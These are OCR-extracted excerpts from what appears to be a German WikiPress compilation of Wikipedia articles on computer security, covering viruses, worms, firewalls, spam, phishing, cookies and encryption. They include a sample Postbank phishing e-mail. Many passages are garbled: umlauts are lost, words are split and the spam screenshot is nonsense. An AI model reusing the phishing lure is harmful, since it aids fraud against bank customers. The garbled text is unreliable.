werden sondern man muss wie bei e
46. Computer Viren Report 1989 ISBN 3 8092 0530 3 Burger Ralf Das gro e Computer Viren Buch 1989 ISBN 3 89011 200 5 Janssen Andreas KnowWare 170 Viren Hacker Firewalls 2005 ISBN 87 90785 83 5 Ludwig Mark A The Giant Book of Computer Viruses 1998 ISBN 0 929408 23 3 Skardhamar Rune Virus Detection and Elimination 1995 ISBN 0 12 647690 X Szor Peter The Art Of Computer Virus Research And Defense 2005 ISBN 0 321 30454 3 Quelle http de wikipedia org wiki Computervirus Historie 19 7 02 Anonym angelegt danach bearbeitet von den Hauptautoren Mario23 DarkDust Peter Gerwinski AchimP Linum WikiMax PD902E03F dip t dialin net Keymaster D Stf MaKoLine Plenz Strabo Kasper4711 Pemu Herr Th Diddi MichaelDiederich Fomafix Nerdi Liquidat Tabacha ThomasHofmann ChristianErtl Kubieziel Steven Malkovich Mic r Arittner 45054 Rooty Dr eina ugige Bandit ElRaki Clemensfranz Harpax Wiegels Plasmagunman Soronk Kretzer2 Flea Reniar Jackalope Quirin Harald M hlb ck Rtc Achim Raschka Frank penner Matth us Wander Siehe auch L scher TomK32 anonym 12 1 06 1 2 06 WikiPress Redaktion Angarsk Angarsk auch Angarsk 238 ist ein Computervirus der seit Dezember 1992 in Umlauf ist und urspriinglich von einem Urheber vermutlich aus der russischen Stadt Angarsk stammt Angarsk infiziert alle com Dateien auch command com verf gt aber au er der Vermehrungsfunktion ber keine sp
47. Datensicherheit ist eine Voraussetzung von Datenschutz Nur wenn ge eignete Schutzma nahmen getroffen werden kann man davon ausgehen dass vertrauliche bzw personenbezogene Daten nicht in die H nde von Un befugten gelangen Hierbei spricht man in der Regel von technischen und organisatorischen Ma nahmen zum Datenschutz welche auch in der Anla ge zum 9 BDSG beschrieben sind H ufig befindet sich eine Beschreibung der Datensicherheit in einem Datenschutzkonzept oder Sicherheitskonzept Ma nahmen zur Datensicherheit umfassen unter anderem die physische bzw r umliche Sicherung von Daten Zugriffskontrollen das Aufstellen feh lertoleranter Systeme und Ma nahmen der Datensicherung und die Ver schl sselung Wichtige Voraussetzung ist die Sicherheit der verarbeitenden Systeme Ein effektives Sicherheitskonzept ber cksichtigt jedoch neben technischen Ma nahmen auch organisatorische und personelle Ma nah men wie z B das Schaffen geeigneter Organisations und Management strukturen oder die Schulung und Sensibilisierung von Personen Quelle http de wikipedia org wiki Datensicherheit Historie 27 9 03 Angelegt von Oberzerfer danach bearbeitet von den Hauptautoren Iqfisch Thika Oberzerfer Forevermore T V Verlag Duesentrieb Pale Man RolfS Kubieziel Jowi24 Stf Haasalex anonym 12 1 06 1 2 06 WikiPress Redaktion 20 Viren W rmer Trojaner Malware Als Malware von engl malicious b swillig und Software b
48. Datenverkehr zwischen den Teilbereichen um ungew nschten Verkehr zu verhindern und nur den gew nschten Verkehr passieren zu lassen Prinzipiell besitzt dementsprechend eine Firewall zwei wesentliche Aufgaben Unterbinden von ungewolltem Datenverkehr von externen Computer systemen zum gesch tzten Bereich Unterbinden von ungewolltem Datenverkehr vom gesch tzten Bereich zu externen Systemen Rund um das Thema Firewall existieren viele Begriffe die teilweise richtig sind aber sehr oft nur die halbe Wahrheit vermitteln Umgangssprach lich ist mit einer Firewall h ufig die Software gemeint welche den Daten verkehr zwischen den getrennten Bereichen kontrolliert und regelt Man muss also zwischen dem Sicherheits Konzept Firewall und der konkre ten Realisierung der Firewall unterscheiden Das Sicherheitskonzept be schreibt Regeln welche Informationen die Firewall passieren d rfen und welche nicht Realisiert wird das Konzept durch eine Software die auf einer oftmals speziellen Hardware l uft Die Hardware ist dabei f r das Empfangen und Senden der einzelnen Datenpakete zust ndig und somit eigentlich kein sicherndes Element und die Software regelt den Verkehr Was wird durchgelassen Was wird nicht durchgelassen Dabei ist die Hardware h ufig wie bei anderen Netzelementen Routern oder Gate ways auch f r die Aufgabenstellung optimiert schnelle Pr fung von Pa keten hochperformantes Empfangen und Senden von Paketen etc 87
49. Der Algorithmus ist sehr kompakt und f nf bis zehnmal schneller als der weitverbreitete DES Deshalb findet der RC4 Algorithmus in einigen Echtzeit Systemen Anwendung wie beispielsweise Mobilfunk Cellular Digital Packet Data SSH Secure Shell WLAN Wireless LAN oder den Dateiverschl sselungs Programmen SecurePC und Cryptext Die Verarbeitungsgeschwindigkeit des DES ist jedoch selbst in kleinsten Mi krokontrollern meist ausreichend Der Schl ssel beim DES und anderen Blockchiffren wie dem AES CBC Mode kann im Gegensatz zum RC4 auch mehrfach verwendet werden Vergleichbare Stromchiffren wie SEAL sind hnlich schnell und gelten als sicher Codes mit Schl ssell ngen von 128 Bit gelten als unsicher und leicht entschl sselbar entgegen einiger Ger chte ist RC4 mit 2048 Bit jedoch noch nicht gebrochen worden Wie bei allen Verschl sselungsverfahren ist eine saubere Implementierung sehr wichtig WEP Wired Equivalent Privacy mag hier als mahnendes Beispiel dienen Quelle http de wikipedia org wiki RC4 Historie 6 3 04 Angelegt von Chrizz danach bearbeitet von den Hauptautoren Chrizz Fabian Bieker Pinoccio Brubacker Fgb Steven Malkovich MichaelDiederich anonym 12 1 06 1 2 06 WikiPress Redaktion Brute Force Methode Brute Force Methode auf Deutsch etwa Methode der rohen Gewalt ist der Fachbegriff f r eine L sungsmethode schwerer Probleme aus dem Bereich der Informatik und der Spieltheorie die auf dem Ausprobi
50. Die Kosten sowohl f r die Vorhaltung der berwachungstechnik als auch f r die konkrete Durchf hrung hat der Betreiber zu tragen Entsprechen de L sungen kosten ab etwa 20 000 EUR aufw rts Wer darf die berwachung anordnen Je nach Fall und Rechtsgrundlage in der Regel ein Richter ein zust ndiger Bundesminister oder Landesminister Polizei Zoll Bundesamt f r Verfassungsschutz ein Landesamt f r Verfassungsschutz Wie funktioniert die berwachung Es wird anhand von E Mail Adressen berwacht Der E Mail Verkehr wird komplett gefiltert und der MIME Header einer E Mail auf die Exis tenz einer gesuchten E Mail Adresse hin berpr ft Wurde eine solche E Mail Adresse gefunden wird die komplette E Mail auf einen Server des berwachers per FTP kopiert Pikanterweise wird die Verbindung zwischen E Mail Filter Server und dem berwacher Server mit IPsec verschl sselt Ungekl rte Fragen Wie z hlt man Teilnehmeranschliisse Darf ein E Mail Server Betreiber dar ber informieren dass in seinem konkreten Fall der E Mail Verkehr berwacht wird Quelle http de wikipedia org wiki E Mail berwachung Historie 3 1 05 Angelegt von Fgb danach bearbeitet von den Hauptautoren Fgb Forevermore Stefan Selbach anonym 12 1 06 1 2 06 WikiPress Redaktion Spam Spam ist der unverlangte massenhafte meist strafbare Versand von Nach richten Diesen Missbrauch bezeichnet man als spamming Spammen und die T ter als Spammer Die
51. Download akzeptiert und ffnet wiederholt sich das Ganze Derzeit gibt es f r f nf IRC Programme IRC W rmer mIRC pIRCh vIRC dIRC und Xircon P2P W rmer Peer To Peer ist eine Netzwerkform die ohne Server Rechner im Netz verbindet d h eine Direktverbindung zwischen den einzelnen Benutzern herstellt Die meisten im Internet erh ltlichen Tauschb rsen wie Kazaa oder Morpheus sind Peer To Peer Netzwerke Es gibt zwei M glichkeiten wie sich ein Wurm in einer Tauschb rse verbreitet Die erste M glichkeit ist dass sich der Wurm in den freige gebenen Ordner kopiert von dem andere Benutzer Dateien downloaden k nnen F r diese Art von W rmern ist die richtige Namensgebung sehr wichtig da mehr Benutzer eine Datei mit einem interessanten Namen downloaden als eine Datei mit einem zuf llig erstellten Namen Dar um gibt es W rmer die ihre Namen im Internet auf speziellen Seiten suchen um so glaubw rdig wie m glich zu sein Diese Art der Verbrei tung in Tauschb rsen ist sehr einfach aber nicht besonders effektiv Bei der zweiten M glichkeit der Verbreitung bietet der Wurm ber ein Peer To Peer Protokoll bei jeder Suchabfrage den anderen Benutzern des P2P Netzwerkes eine infizierte Datei als Suchergebnis an Der Benut zer kopiert dann den Wurm als vermeintlich gesuchte Datei auf seinen Computer und infiziert diesen beim ffnen Diese Art der Verbreitung ist sehr effektiv aber schwierig zu programmieren und deshalb kaum verbre
52. Ekuah Tabacha Warp Avatar Harald M hlb ck Liquidat XRay PeeCee Pgs Stf Stern Ingo Weisem ller Wolle1024 MichaelDiederich Hendrik Brummermann Idler Steven Malkovich Diddi TomK32 Guizza AND RE Physikr Alfred Grudszus Wiegels Kopoltra MGla Igelball B N Heliozentrik Remi Wolfgang1018 Jello Don Quichote anonym 12 1 06 1 2 06 WikiPress Redaktion Loveletter Bei Loveletter oft auch I love you Virus genannt handelt es sich um einen Computerwurm der sich am 4 Mai 2000 und den Folgetagen explo sionsartig per E Mail verbreitete Die Betreffzeile lautete I love youc Reaktion der ffentlichkeit Auf Grund seiner schnellen und weiten Verbreitung sowie der H he des entstandenen Schadens wurde die Thematik von den Massenmedien auf gegriffen und in das ffentliche Bewusstsein ger ckt Auf diese Weise wurden viele Computernutzer in Europa gewarnt lange bevor die Anti virenprogramm Hersteller ihre Signaturen aktualisiert hatten Allerdings f hrte das auch dazu dass sich eine Vielzahl von Nachahmern fand die mit so genannten Baukasten Viren ihr vermeintliches K nnen unter Be weis stellen wollten Nach kurzer Zeit gab es erste Berichte ber ein Profil des T ters Es han dele sich um einen frustrierten Sch ler von den Philippinen Quelle dieser Informationen war der Kommentar in den ersten beiden Zeilen des Skripts rem barok loveletter vbe lt i hate go to school gt rem by spyder ispyder
53. Firewall nicht mehr gesichert werden Personal Firewalls die auch ausgehende Verbindungen kontrollieren konnten in der Vergangenheit auch bestimmte E Mailw rmer die ihren eigenen SMTP Client mitbrachten an der Verbreitung hindern Einige E Mailw rmer versuchen daher die Personal Firewall zu beenden Ob dies gelingt h ngt stark von der eingesetzten Firewallsoftware ab H ufig werden Personal Firewalls auch dazu eingesetzt Spyware zu erkennen die noch nicht in der Datenbank eines Spywarescanners ent halten ist Verlangt ein unbekannter Prozess Verbindung nach dem Inter net ist diesbez glich ein Verdacht gegeben dessen Pr fung unerfahrenen Anwendern jedoch oft schwerf llt So werden h ufig Programme f r Spy ware gehalten die lediglich nach Updates suchen Umgekehrt tarnt sich Schadsoftware oft als n tzlicher Systemprozess Ein technisches Problem ist dass es zahlreiche M glichkeiten gibt die Fil terung ausgehender Verbindungen zu umgehen Die Paketfilterung kann ge nauso wiebeiexternen Paketfiltern ber getunnelte Verbindungen umgangen werden Die Anwendungskontrolle kann umgangen werden indem ein von der PFW als vertrauensw rdig eingestuftes Programm zur Herstellung der Verbindung herangezogen wird So demonstrierte beispielsweise der Chaos Computer Club Ulm in einem Vortrag ber Personal Firewalls eine Methode den Browser aufzurufen und Informationen nach au en zu senden die von keiner der getesteten PFWs erka
54. Holland Wau 159 162 177 180 Host 94 HTML 31 52 90 91 163 184 231 HTTP Cookie 133 164 223 Hypertext Transfer Protocol 89 91 164 208 319 322 Hypertext Transfer Protocol Secure 321 I I love you Virus 62 IBM 50 119 122 124 126 277 ICANN 162 ICQ 53 61 190 IDEA 276 277 319 IDNA 231 IEEE 239 240 244 246 251 253 254 IETF 150 187 206 319 Infrastruktur Netzwerk 239 Integrated Services Digital Network Siehe ISDN Integrit t 20 130 142 149 153 247 International Data Encryption Algorithm Siehe IDEA Internet 12 14 15 21 52 60 64 69 82 83 87 89 94 106 108 135 153 154 163 170 179 182 183 190 210 212 227 256 267 271 292 318 Internet Control Message Protocol 101 215 Internet Explorer 13 26 109 133 147 319 Internet Message Access Protocol 185 322 Internet Protocol 241 256 Internet Relay Chat 50 53 60 63 82 101 190 322 Internet Service Provider 108 164 185 Intrusion Detection System 13 78 96 IP Spoofing 208 211 IPsec 188 257 ISDN 108 180 256 J Jaschan Sven 69 Javascript 31 42 52 90 96 109 184 196 224 Java Programmiersprache 42 219 K Kazaa 54 65 Kennwort 13 83 134 286 Kerberos 240 Kerckhoffs Auguste 268 313 Kerckhoffs Prinzip 268 Kernel 114 257 Keylogger 73 82 234 288 KGB Hack 161 177 224 Killfile 192 KISS Prinzip 251 Knoppix 25 Koch Karl 161 180 224 Kompromittierung 21 Kopie
55. IRC Peer To Peer und Instant Messaging Programme oder ber Dateifreigaben Die erst seit kurzem auftretenden Handyw rmer verbreiten sich ber Bluetooth und infizierte MMS Ein Wurmprogramm muss nicht unbedingt eine spezielle Schadensrou tine enthalten Da das Wurmprogramm aber sowohl auf den infizierten Systemen als auch auf den Systemen die es zu infizieren versucht Res sourcen zur Weiterverbreitung bindet kann es allein dadurch gewaltige wirtschaftliche Sch den anrichten Des Weiteren k nnen W rmer die Be lastung anderer Systeme im Netzwerk wie Mailserver Router und Fire walls erh hen Unterschied zwischen Virus und Wurm Computerviren und w rmer verbreiten sich beide auf Computern doch basieren sie zum Teil auf vollkommen verschiedenen Konzepten und Techniken Ein Virus verbreitet sich indem er Dateien infiziert also sich in eine ausf hrbare Datei in einigen F llen auch in einen Bootsektor oder als 50 Computerwurm Makro in eine interpretierbare Datei integriert und somit Teil einer schon bestehenden Programmroutine wird Die Verbreitung des Virus er folgt durch Weitergabe dieser infizierten Dateien Auf welchem Wege sie weitergegeben werden via Datentr ger oder Netzwerke ist f r die Defi nition Virus unerheblich W rmer dagegen warten nicht passiv darauf dass sie mit infizierten Dateien weitergegeben werden Sie versuchen auf unterschiedliche Art ak tiv via Netzwerk weitere Computer zu infizieren
56. Internet Zugriff auf Computersysteme gew hren Hierzu z hlen z B die bei so genannten Skriptkiddies beliebten Pro gramme Sub Seven und Back Orifice Quelle http de wikipedia org wiki Hintert r Historie 16 1 04 Angelegt von LosHawlos danach bearbeitet von den Hauptautoren LosHawlos D235 YurikBot Diesterne Lostintranslation FlaBot Steven Malkovich Achim Raschka anonym 12 1 06 1 2 06 WikiPress Redaktion Hoax Ein Hoax engl Jux Scherz Schabernack auch Schwindel bezeichnetim Deutschen eine Q 3 3 N Y Falschmeldung die sich per E Mail Instant P Messenger oder auf anderen Wegen SMS MMS Wingdings verbreitet von vielen f r wahr gehalten und p daher an viele Freunde weitergeleitet wird Das gt Q KX Wort kommt wahrscheinlich aus der Verkiir zung von Hokus aus Hokuspokus Ein Hoax Abb 14 Hoax Unter kann auch als moderne Form der Zeitungsente Br oder als Urban Legend betrachtet werden Flugnummer der betroffenen ltestes Beispiel ist der so genannte Good Fl ge von 9 11 nicht wahr Time Virus eine angebliche E Mail die beim ffnen die Festplatte l scht Die Warnung vor diesem Virus verbreitete sich 1994 millionenfach ber E Mail und wurde auch von vielen Zeitungen und Fachinstitutionen ver ffentlicht Die damals vermeintliche Gefahr durch Viren die sich per E Mail verbreiten wurde allerdings erst Jahre sp ter Wirklichkeit beispiels weise durch Lovelett
57. Juli 2004 Mydoom M verbreitet sich wieder als Anhang in Error Mails Er durchsucht die Festplatte nach E Mail Adressen versen det sich an diese und fragt bei gro en Suchmaschinen nach weiteren Adressen in dieser Dom ne an Quelle http de wikipedia org wiki Mydoom Historie 31 1 04 Angelegt von Remi danach bearbeitet von den Hauptautoren Remi Stf Tsor Steven Malkovich BWBot Centic Stefan K hn Weede Zwobot MichaelDiederich Grimmi59 rade Christian Arntzen MFM anonym 12 1 06 1 2 06 WikiPress Redaktion Sasser Sasser Bedeutung des Namens Wortspiel aus dem englischen Verb to sass freche Antworten geben und der Tatsache dass er den Dienst LSASS ausnutzt ist der Name eines Computerwurms der sich Anfang Mai 2004 in hoher Geschwindigkeit auf Computern mit den Micro soft Betriebssystemen Windows 2000 sowie Windows XP verbreitete Sein offizieller Name ist W32 Sasser Unter den betroffenen Systemen 68 Sasser waren Computer bei Banken Reiseunternehmen und ffentlichen Ein richtungen Betroffen waren die Computer der deutschen Postbank der finnischen Sampo Bank der Delta Air Lines und der Europ ischen Kommission sowie weiterer Unternehmen und Beh rden weltweit Der Programmierer von Sasser Sven Jaschan ein damals 17 j hriger Sch ler aus Waffensen einem Ortsteil der Stadt Rotenburg W mme wurde am 7 Mai 2004 vor bergehend festgenommen Der Informatiksch ler Berufsfachschule ist auch f r d
58. Kontonummer PIN 4 TAN Schalten Sie jetzt Ihr Postbank Girokonto f r das Online Banking frei Abb 19 Beispiel einer Phishing Webseite bergibt der Besucher aus Gewohnheit oder Naivit t korrekte Daten kann der Betr ger mit der abgefangenen PIN und der ersten TAN eine Geld berweisung t tigen Die zweite TAN erm glicht die nderung der PIN um den Eigent mer von seinen eigenen Bank Seiten auszusperren und dadurch die Entdeckung des Gelddiebstahls zu verz gern Auch in Deutschland wurden bereits F lle bekannt allerdings nicht in dem Ausma wie z B den Vereinigten Staaten Dieser auff llige Unter schied zu den USA in denen tats chlich hohe Sch den auftreten l sst sich zum Teil auf das in Deutschland benutzte PIN TAN System zur ckf h ren Das Erschleichen einer zus tzlichen Transaktionsnummer TAN ist relativ aufwendig und kann wegen des ver nderten Dialogs vom Kunden bemerkt werden Die hier wiedergegebene Mail wurde nicht in Textform verschickt son dern als Bild welches den Text enth lt und seinerseits einen Link zu einer Phishing Webseite darstellt Betreff POSTBANK INTERNET BANKING Von Deutsche Postbank lt custservice_448396585497 postbank de gt Datum 18 06 05 Postbank Sehr geehrte Kundin sehr geehrter Kunde 236 Phishing Der technische Dienst der Bank fuhrt die planmassige Aktualisierung der Software durch Fur die Aktualisierung der Kundendatenbank ist es no tig Ihre Bankdaten erneu
59. Konzept wurde urspr nglich von Netscape entwickelt und in RFC 2109 spezifiziert Die Lebensdauer des Cookies kann vom Webserver beschr nkt worden sein Nach deren Ablauf l scht der Browser das Cookie Bei einigen Brow sern wie zum Beispiel Mozilla kann der Benutzer die Lebenszeit selbst ndern Verwendung Eine typische Anwendung von Cookies ist das Speichern pers nlicher Einstellungen auf Websites zum Beispiel in Foren Damit ist es m glich diese Website zu besuchen ohne jedes Mal die Einstellungen erneut vor nehmen zu m ssen Auch Online Shops verwenden Cookies um virtuel le Einkaufsk rbe zu erm glichen Der Kunde kann damit Artikel in den Einkaufskorb legen und sich weiter auf der Website umschauen um da nach die Artikel zusammen online zu kaufen Cookies dienen auch der Sicherheit Da man sich bei manchen Websi tes wie Wikipedia per Passwort einloggen kann werden Cookies gesetzt um genau diesen Nutzer eindeutig zu erkennen und damit nicht beijedem Aufruf einer Unterseite das Passwort erneut eingegeben werden muss H ufig werden Logininformationen ber eine Session ID Zahlenfolge die nur f r eine Session g ltig ist in den Cookies gespeichert Das ist sicherer und weniger aufwendig als diese Informationen jeder URI hin zuzuf gen und damit Unbefugten den Zugriff auf gesch tzte Inhalte zu erleichtern Gefahren Die eindeutige Erkennung kann allerdings auch zu missbr uchlichen Zwecken ausgenutzt werden Cookie
60. Moosewatcher MoriBot Morido Morken Morricone MovGP0 Mpils Mps MR Mr Anderson Mrehker MrTux Ms1203 MsChaos Mschlindwein Much89 Mue Mugros Mullkubel Muns Murtasa Musik chris Mvb Mvo Mvs Mwka Mx2000 Mxr Myr Myrisa Nachdenklicher Nachtigall Naddy Nameless Namex Napa Nb Nd Neg Neil Carter Nekton Neo23 Neo23x0 Ne okortex NeonZero Nerd Nerdi Netspy Netzize Neuroposer NewImage Nfsa Nicog Nicolas Nightwish62 Nikai Nikolaus Nimmich Nina Ninjamask NiTenIchiRyu Nitpicker Niwi Nobody de Nocturne Nomeata Nonanet Nopherox Nordelch Nornen3 Norri Nyks Oa Obersachse Oberzerfer Ocrho OderWat Odigo Odin Odino Odo Okatjerute Oldobelix Oliver Schad Omi Omi s T rtchen OS sterreicher OWeh Owltom Ozuma Pacifier Paddy Paelzeur Pal05 Pale Man Palica Panzerknacker Parzi Paselstep PasO Pasp PaterSiul PatriceNeff Patrick Permien PatrickD Paul Ebermann PaulchenP Pazz Pco PD902E03F dip t dialin net PDD Peacemaker Pee Cee PeerBr PeKron Pelle6 Pelz Pemu Peng Pepe Perrak Peter Gerwinski Peter200 Peterlustig Pgs PhFactor Philipd Philipendula PhilipErd s Philippschaumann PhilippWeissenbacher Philip seeger Phoenix2 Phoenix21jh Phrood Physikr Piefke Pierre gronau Pietz PIGSgrame Pinguin tk Pinoccio Pischdi Pit Pit72 Pitz Pixelfire Pkn Plasmagunman Plasser Plenz Pm Pne Polarlys Poldi Ponte Poupou l quourouce Pr498sl Priwo Proesi
61. Option die bertragenen Daten mit ZLib zu komprimieren dies wird jedoch in der Praxis vor allem aus Per formancegr nden kaum eingesetzt SSL in der Praxis SSL Verschliisselung wird heute vor allem mit HTTPS eingesetzt Die meisten Webserver unterstiitzen TLS viele auch SSLv2 und SSLv3 mit ei 321 Kryptografie ner Vielzahl von Verschl sselungsmethoden fast alle Browser und Server setzen jedoch bevorzugt TLS mit RSA oder AES Verschl sselung ein SSL ist ohne eine zertifikatsbasierte Authentisierung problematisch wenn ein Man In The Middle Angriff erfolgt Ist der MITM vor der bergabe des Schl ssels aktiv kann er mit beiden Seiten den Schl ssel tauschen und so den gesamten Datenverkehr im Klartext mitschneiden In Verbindung mit Virtual Hosts z B mit HTTP ist es grunds tzlich als Nachteil zu werten dass pro IP Adresse nur ein Zertifikat verwendet werden kann da die eigentlichen Nutzdaten des dar ber liegenden Pro tokolls und damit der Name des VHosts zum Zeitpunkt des SSL TLS Handshakes noch nicht bertragen wurden Weitere bekannte Anwendungsf lle f r SSL sind SMTP NNTP SIP IMAP IRC und MBS IP Software Bekannte Implementierungen des Protokolls sind OpenSSL und GnuT LS Quelle http de wikipedia org wiki Transport_Layer_Security Historie 12 5 04 Angelegt von Moolsan danach bearbeitet von den Hauptautoren Robot Monk Graui Ufobat Thomas Springer Hubi Moolsan Seebi Steven Malkovich Fomafix
62. PC Benutzer quasi gezwungen sein bestimmte Komponenten einzusetzen damit bestimmte Programme starten oder auch um berhaupt an be stimmte Informationen auf ihrem eigenen System zu gelangen Trotz gegenteiliger Behauptungen liegt der Verdacht nahe dass NG SCB nicht f r grunds tzlich sicherere Programme sicher im Sinne von Computersicherheit und gesch tzte Daten sondern zur sicheren Nut zung von DRM Systemen entwickelt wurde Es wird behauptet Programme die im Nexus laufen w rden sich von normalen Programmen durch bessere Sicherheit unterscheiden Die Definition von Sicherheit liegt aber in den H nden der Programmierer des Betriebssystems bzw bei der Firma Microsoft Es ist davon auszuge hen dass der k nftige PC Benutzer dieser und folgender Betriebssys teme durch die Integration dieser Hardwarekomponenten in Personal Computer ein St ck weit seine Herrschaft ber den eigenen PC aufgeben muss um bestimmte Programme Dateien oder Netzwerkdienste nutzen zu k nnen Die n tige neue Hardware l sst vermuten dass nicht zuletzt die Hard ware Industrie Produktion und Multimedia Industrie Urheberrechte ein gewaltiges Interesse an der Einf hrung einer solchen Technik ha ben Quelle http de wikipedia org wiki Next Generation_Secure_Computing_Base Historie 24 1 04 Angelegt von Klaus Jesper danach bearbeitet von den Hauptautoren Klaus Jesper Makaveli Zwobot Daniel StephanKetz Mps Steven Malkovich Je
63. Paul A Owes Viagra duty few price F h t i G Mu Fo Lotsa Myrick February 10th Update Ths 2 m r meee Hott he private warehouse for meds ha Mad I Armia Knapp FREE PlayStation 2 00 PlayStation Portable Oxi THE v n m ro inma Get yow PSP today fer nething o Q F s Ma T Benson Damion Butcher s window Let mo meat your needs Mu F Beth Padgen 3 29 rate approval Ma T Mamberte Smiley Application approval tsr pe ey com Wed Mar 2005 03 15 49 100 a Mu Maureen Brooke Phetasbep CS 99 96 a x A Mu r Gapo Pain Reliever Pilis Online o1k 2 24 E g 5 h t Mau D o Martin Engle Your accoun 2507395 Ma Abb 16 Spam in einem Gmail Konto 189 Sonstige Themen UCE ist eine h ufige Unterart davon die unverlangte Zusendung von Werbung Daneben gibt es noch das so genannte Suchmaschinen oder Index Spamming bei dem der Verursacher die Ergebnisse die eine Internet Suchmaschine aufeine Stichworteingabe hin ausgibt mit speziellen Tricks derart manipuliert dass auf den vordersten Pl tzen Webseiten angezeigt werden die keine f r den Surfer relevanten Informationen enthalten Auch Logfiles von Webservern sind nicht vor Spam gefeit diese werden h ufig mit gef lschten Referrer Daten gef ttert Webforen Blogs und Wi kis sind ebenfalls von Spam betroffen Mittlerweile gibt es spezialisierte Programme f r fast jeden ber das Internet ffentlich zug nglichen Kommunikationskanal SPIM Spam over Instant Messaging b
64. Personal Firewalls for Administrators and Remote Users Prentice Hall PTR New Jersey 2003 ISBN 0 13 046222 5 Zwicky Cooper Chapman Einrichten von Internet Firewalls O Reilly 2001 ISBN 3 89721 169 6 Quelle http de wikipedia org wiki Personal_Firewall Historie 24 8 03 Angelegt von Diddi danach bearbeitet von den Hauptautoren Harald M hlb ck Dishayloo Kubieziel Diddi Netzize Eike sauer Nerdi Askwar Pierre gronau Flominator Softie Steven Malkovich Liquidat Sir TuxIskariote Fomafix ChristianGlaeser Avatar TheK Molily Hansmi Jed Mino Matze6587 Ralf5000 Frankhoe Achim Raschka RedBot MichaelDiederich Marti7D3 anonym 12 1 06 1 2 06 WikiPress Redaktion Spyware Als Spyware wird blicherweise Software bezeichnet die pers nliche Da ten des Benutzers ohne dessen Wissen oder gar Zustimmung an den Her steller der Software das so genannte Call Home oder an Dritte sendet Meist dienen die Spyware Programme dazu das Surf Verhalten im In ternet zu analysieren um diese Daten kommerziell zu nutzen oder um gezielt Werbebanner oder Popups einzublenden die an die Interessen des Benutzers angepasst sind Die Firmen erhoffen sich davon eine Steigerung der Wirksamkeit dieser Werbemethoden Um Arger mit Juristen zu umgehen kennzeichnen viele Computerpro gramme mit Anti Spyware Funktionen diese Softwarekomponenten als m g licherweise unerwiinschte Software PUS potentially unwanted software Spyware
65. Proggy Progman Prometeus Prussio Ps246 Psycho Chicken PuppetMaster Purodha PyBot Pylon Quadriat Qualle Quirin Quix0r Qwgchris R y RabeRalf Ralf Pfeifer Ralf Roletschek Ralf5000 RalfG Ralf Henning Steinmetz RalfZosel Rama Randbewohner Ranthoron Rasterzeileninterrupt Rat Ratatosk Raubtierkapita list Raymond Rbb Rbuchholz Rdb Rdoering RealLink RedBot Redf0x Refomicus Remi Rene Schmidt Reniar Revvar RexNL Rho Richard b Richie Rigoice Riptor Rivi RKBot RKraasch 325 Anhang Robb Robbot RobbyBer RobertLechner Robot Robot Monk RobotE Robotje RobotQuistnix Rocco Rockoo Rodolfo4711 RokerHRO Rolandlllig Rolandj Rolf Maria Rexhausen Rolf Wei rauch RolfM RolfS Romanm Root axs Rooty Rosenzweig Roughneck Roy Rtc Rumbel Ruscsi Rwild S K Sadduk Saemon Sal9000 Salmi Samweis Sandstorm Sansculotte Sascha Br ck Sbey er Sch Schaengel89 Schelle Schewek Schizoschaf Schlendrian Schlonz Schluddi Schlumpf Schlurcher Schmunzelmonster Schnargel Schoopr Schoos Schrottie Schubbay Schwalbe Sciurus Seb35 Sebastian Sebastian Hagedorn Sebastian Wallroth SebastianBreier Sechmet Seebi Seef Seewolf Sei Shonagou Serpens Sewa Sgop Shamrock7 Shannon Sharkxtrem Sherlock Holmes ShiningBase Shmia Shodan42 Shurakai Sicherlich Siehe auch L scher Siggi Sigi21 Simeon Kienzle Simon W Simoor Simplicius Sinar Sir TuxIskariote SirJective Skicu Skriptor Sky
66. Programme getauscht wurden wurden Makroviren ein sehr gro es Problem f r die Anwender In den Jahren darauf erschienen dann die ers ten Makroviren f r Excel 1997 Powerpoint und Access beide 1998 und Visio 2000 1996 wurde auch das erste Virus Constructor Kit f r Ma kroviren geschrieben das es auch Personen ohne Programmierkenntnisse erm glichte Viren zu erstellen 1996 erschien mit Boza auch das erste Virus f r Microsoft Windows 95 Damit wurde gezeigt dass das neuestes Microsoft Betriebssystem f r Viren doch nicht wie behauptet unantastbar war Da der Kampf zwischen Antivirenherstellern und Virenautoren zu gunsten der Antivirenhersteller gewonnen schien wurden 1998 mit W32 HPS und W32 Marburg die ersten polymorphen Windows 32 Bit Viren geschrieben Kurze Zeit sp ter entstand mit Regswap auch das erste metamorphe Virus f r diese Betriebssysteme 1998 und 1999 erschienen die ersten VBS und JS Viren und als lo gische Konsequenz auch die ersten HTML Viren Diese Viren arbeiteten mit dem umstrittenen Zusatzprogramm Windows Scripting Host Nun konnten auch Webseiten von Viren infiziert werden In dieser Zeit wurden auch einige andere f r den Benutzer ungef hr liche Viren geschrieben die dennoch historisch interessant sind Bei spiele sind das OS2 AEP Virus das als erstes ausf hrbare Dateien des Betriebssystems OS 2 infizierten konnte oder die ersten Viren f r HLP Dateien f r PHP Dateien f r Java AutoCAD Bash
67. Regewerk Coment Filtar Wwan Spamchackf iRerung Abb 7 Aufbau einer Firewall DSL Modems DSL Router DSL Router bernehmen normalerweise die Routing Funktionalit t und k nnen Zugriffe aus dem Internet auf das lokale Netz blockieren Portfil ter Funktionalit t Mit Hilfe von NAT ist es m glich mehrere Rechner an einem DSL Modem zu betreiben Einen Content Filter enthalten sol che Produkte zumeist nicht Produkte Microsoft Internet Security and Acceleration Server ist eine kommerzi elle Firewall von Microsoft Astaro Security Linux ist eine kommerzielle Linux Distribution f r Firewall Systeme Smoothwall ist eine f r Firewall Systeme optimierte Linux Distribution Netfilter Paketfilter innerhalb des Linux Kernels Der Eindisketten Router fli4l ist neben der CD Variante Gibraltar ein Projekt das im Sinne einer nachhaltigen Nutzung die Verwendung von alten PCs als Firewall gestattet IPCop ist eine einfach zu bedienende Linux Distribution die zum Ziel hat eine durch und durch sichere Firewall zu sein MOnOwall ist eine BSD basierende Firewall die teilweise mit ihren Funktionen an Profi Firewalls herankommt und trotzdem sehr einfach zu konfigurieren ist mGuard ist eine Hardware Firewall zur Absicherung einzelner Server der Firma Innominate VvtFW sind Firewalls auf Basis von OpenBSD pf der Firma vantronix 93 Software Literatur Artymiak Jacek Building Firewalls with OpenBSD and PF 2nd ed devGuide net Lublin 2003
